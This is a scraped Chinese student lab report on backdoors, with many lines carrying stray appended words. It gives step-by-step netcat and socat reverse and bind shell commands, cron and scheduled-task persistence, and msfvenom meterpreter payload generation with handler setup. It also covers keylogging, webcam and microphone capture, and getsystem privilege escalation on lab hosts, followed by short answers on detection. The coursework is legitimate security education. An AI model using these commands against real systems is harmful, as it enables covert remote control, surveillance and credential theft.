Exp2 后门原理与实践 20164311

 

实验一:使用netcat获取主机操做Shell,cron启动

 1.Windows得到Linux Shelllinux

(1)打开本机win10的cmd.exe,使用命令 ipconfig 查看win10的IP地址。web

(2)并用命令 ncat.exe -l -p 4311 监听本机的4311端口,等待shell

(3)启动虚拟机,在kali上面打开一个终端,并输入 nc 192.168.1.108 4311 -e /bin/sh 链接win10。windows

(4)win10得到linux的shell,可执行linux指令,好比ls。浏览器

2.Linux得到Windows Shell安全

(1)与上面第一个步骤相似,惟一须要注意的地方是指令改为 ifconfig 以此来查询IP地址,并监听4311端口。架构

(2)win10使用 ncat.exe -e cmd.exe 192.168.215.128 4311 (须要注意的是在使用该指令以前,要进入ncat文件夹所在的目录)tcp

(3)同理,在Linux下可使用win10中的指令编辑器

3.nc传输数据工具

(1)win10监听本地4311端口 ncat.exe -l 4311 ,再用kali链接该win10端口 nc 192.168.1.108 4311 ,而后从任意一方输入的字符串都能同时在win10方和Linux方显示。

4.nc定时启动

此时须要用到Crontab指令,该指令是用来定时执行脚本用的。

(1)win10使用命令 ncat.exe -l -p 4311 监听本地的4311端口

(2)Crontab指令增长一条定时任务,并在提示编辑器的页面中选择咱们熟悉的vi编辑器,点击i进入编辑模式。由于我操做的时间是5分这样,因此就把其设定为每小时的第6分钟执行指令,这样就能够较快的执行这段指令。

(3)使用指令 crontab -l 查看并核对其所配置的指令的正确性,确认完毕,在第6分钟,win10得到了Linux的shell,能够执行Linux的相关命令。


实验二:使用socat获取主机操做Shell, 任务计划启动 

(1)在Windows系统下,打开:控制面板->系统和安全->管理工具->任务计划程序,在操做选项(菜单栏)中,选择“建立任务”,填写任务名称011,以后,新建触发器,选择开始任务时间为:工做站锁定时

(2)新建操做,选择启动的程序为socat.exe,参数项填为:tcp-listen:4311 exec:cmd.exe,pty.stderr。这一段话的意思是把cmd绑定到端口号上,再把cmd.exe的stderr重定向到stdout上。

(3)操做完成后,将主机锁屏,激活启动程序,并打开正在运行任务的查看窗口,再次确认是否运行。

(4)在kali终端输入指令 socat -tcp:192.168.1.108:4311 ,此时得到了win10的shell

 


任务三:使用MSF meterpreter(或其余软件)生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

(1)输入指令 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.215.128 LPORT=4311 -f exe > 011_backdoor.exe 

(2)使用指令将生成的后门程序传送到win10主机上,首先win10要调到准备接收的状态 ncat.exe -lv 4311 > 011_backdoor.exe ,而后再在kali上输入相关命令进行传输(注意在此以前须要安装如下ncat指令) ncat -nv 192.168.1.108 4311 < 011_backdoor.exe 

 

 

(3)在kali上输入命令 msfconsole ,并进行相关配置

use exploit/multi/handler              

set payload windows/meterpreter/reverse_tcp   //设置载荷,字面意思应该是基于TCP的反向链接反弹windows shell

show options                      //查看利用模块的设置信息

set LHOST 192.168.215.128              //接下来的两个set是配置模块的设置信息,这里是设置kali的IP

set LPORT 4311                    //设置本主机的端口

show options                     //再次查看一下options,确保设置正确

exploit                        //运行模块

(4)在觉得一切都顺利并启动模块的时候,发现TCP链接并无成功开启,并且程序没法运行,查询了一下,我的认为应该是在win10中没法运行由Linux传过来的x86架构的文件,随后我在一开始的环节中输入了以下指令 msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.215.128 LPORT=4311 -f  exe > 011_backdoor.exe ,并再次启动模块,启动成功!

(5)能够看到,Linux可使用win10的相关命令。


任务四: 使用MSF meterpreter(或其余软件)生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

(1)在Linux中输入 record_mic 命令截获一段音频

(2)使用命令 webcam_snap 指令使用摄像头

(3)在linux中输入命令 keyscan_star 指令记录键盘输入记录并用 keyscan_dump 读取键盘的输入指令

(4)在linux中输入 getuid 指令查看当前用户,再输入 getsystem 进行提权(须要注意的是:提权必须以管理员的身份运行后门程序)

 


 

基础问题回答

(1)例举你能想到的一个后门进入到你系统中的可能方式?

答:使用不安全的浏览器上网时,点开某个网页会自动在后台下载后门程序;下载不正规软件是,后门程序和软件捆绑被下载;经过u盘或者硬盘人为植入。

(2)例举你知道的后门如何启动起来(win及linux)的方式?

答:win:经过命令行执行;在开机启动项中,开机自动运行;双击程序运行。

       Linux:crontab定时执行脚本。

(3)Meterpreter有哪些给你影响深入的功能?

答:键盘的追踪记录。这个就意味着你全部使用电脑进行的键盘操做都会被记录下来,甚至包括你的支付宝密码以及银行密码。相比于照相功能和录音功能,这个功能是能够直接产生经济损失的。

(4)如何发现本身有系统有没有被安装后门?

      答:首先是防火墙的开启,在作实验的过程当中能够看到,在防火墙开启的状态下,后门程序是没法运行的;安装杀毒软件,一样在实验中,开启杀毒软件能够直接对传入的后门程序进行识别,并看成木马予以清除;可是因为老师提到过免杀,因此我以为还有必要时常查看任务管理器,对未知的程序进行甄别并判断是否删除。


 

实验问题总结

本次实验因为一开始就关掉了杀软以及防火墙,因此没有遇到后门程序被查杀或者文件丢失形成的错误,但经过看群里的提问以及本身遇到的问题,我发现不少人包括有一个共性问题,就是系统不支持x86架构的后门程序,此时须要改为64位的程序,具体操做就是在指令msfvenom -p windows后面打上/x64便可。其余方面,因为相较于实验一,没有那么多底层逻辑的理解,对于监听端口等简单操做以前就有所掌握,而惟一没据说过的反弹链接也是较为简单的。可是本实验几乎没有可实践在现实的余地,由于只要有防火墙,后门程序便没法运行,有杀软,则传来的后门程序将会被当作木马查杀。因此比较期待下次的免杀相关的实验。

相关文章
相关标签/搜索